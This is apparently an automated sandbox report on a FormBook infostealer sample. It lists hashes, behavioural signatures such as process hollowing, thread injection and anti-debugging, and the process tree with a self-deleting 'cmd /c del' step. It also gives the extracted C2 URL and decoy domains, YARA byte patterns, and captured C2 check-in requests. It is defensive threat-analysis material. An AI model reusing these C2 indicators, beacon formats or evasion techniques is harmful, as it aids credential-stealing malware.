Windows Analysis Report nji3Lg1ot6

Overview

General Information

Sample Name: nji3Lg1ot6 (renamed file extension from none to exe)
Analysis ID: 552997
MD5: 8eddcc35719034649f6947b2b08bcdf3
SHA1: 5506b69b4584f43232f45299192a540ec0197998
SHA256: 0d072a60b433f330d2ba97d75eae7af07e9d75bc6ed5b1065287661d05e82ab6
Tags: 32 exe trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • nji3Lg1ot6.exe (PID: 5092 cmdline: "C:\Users\user\Desktop\nji3Lg1ot6.exe" MD5: 8EDDCC35719034649F6947B2B08BCDF3)
    • nji3Lg1ot6.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\nji3Lg1ot6.exe" MD5: 8EDDCC35719034649F6947B2B08BCDF3)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autochk.exe (PID: 6480 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • msiexec.exe (PID: 1304 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 7156 cmdline: /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x16a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x1191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x17a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x191f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x40c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x7917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x891a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      1.0.nji3Lg1ot6.exe.400000.2.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        1.0.nji3Lg1ot6.exe.400000.2.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.0.nji3Lg1ot6.exe.400000.2.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18839:$sqlite3step: 68 34 1C 7B E1
        • 0x1894c:$sqlite3step: 68 34 1C 7B E1
        • 0x18868:$sqlite3text: 68 38 2A 90 C5
        • 0x1898d:$sqlite3text: 68 38 2A 90 C5
        • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
        1.2.nji3Lg1ot6.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          1.2.nji3Lg1ot6.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: nji3Lg1ot6.exe, Virustotal: Detection: 37%
          Source: nji3Lg1ot6.exe, ReversingLabs: Detection: 41%
          Yara detected FormBook
          Source: Yara match, File source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sample
          Source: nji3Lg1ot6.exe, Joe Sandbox ML: detected
          Source: 7.2.msiexec.exe.4baf840.4.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 7.2.msiexec.exe.2c5b358.1.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: nji3Lg1ot6.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: msiexec.pdb source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: nji3Lg1ot6.exe, 00000000.00000003.294014026.0000000003090000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000000.00000003.290725743.0000000003220000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: nji3Lg1ot6.exe, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 0_2_00402630 FindFirstFileA,0_2_00402630

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 23.227.38.74:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 23.227.38.74:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 23.227.38.74:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Domain query: www.alibabasdeli.com
          Source: C:\Windows\explorer.exe, Domain query: www.nanasyhogar.com
          Source: C:\Windows\explorer.exe, Network Connect: 172.67.173.57 80
          Source: C:\Windows\explorer.exe, Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe, Network Connect: 50.31.177.38 80
          Source: C:\Windows\explorer.exe, Domain query: www.gigasupplies.com
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.rthearts.com/nk6l/
          Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global traffic, HTTP traffic detected: GET /nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf HTTP/1.1, Host: www.nanasyhogar.com, Connection: close, Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf HTTP/1.1, Host: www.alibabasdeli.com, Connection: close, Data Raw: 00 00 00 00 00 00 00
          Source: global traffic, HTTP traffic detected: GET /nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf HTTP/1.1, Host: www.gigasupplies.com, Connection: close, Data Raw: 00 00 00 00 00 00 00
          Source: Joe Sandbox View, IP Address: 23.227.38.74 23.227.38.74
          Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden
            Date: Fri, 14 Jan 2022 02:39:09 GMT
            Content-Type: text/html
            Transfer-Encoding: chunked
            Connection: close
            Vary: Accept-Encoding
            X-Sorting-Hat-PodId: 188
            X-Sorting-Hat-ShopId: 60258091197
            X-Dc: gcp-europe-west1
            X-Request-ID: 077675b5-2854-474a-9745-e2e99dc925ce
            X-Permitted-Cross-Domain-Policies: none
            X-XSS-Protection: 1; mode=block
            X-Download-Options: noopen
            X-Content-Type-Options: nosniff
            CF-Cache-Status: DYNAMIC
            Server: cloudflare
            CF-RAY: 6cd37e035a694e0e-FRA
            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
            Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
          Source: nji3Lg1ot6.exe, String found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: nji3Lg1ot6.exe, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: unknown, DNS traffic detected: queries for: www.nanasyhogar.com
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exe, Code function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404F61

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: nji3Lg1ot6.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
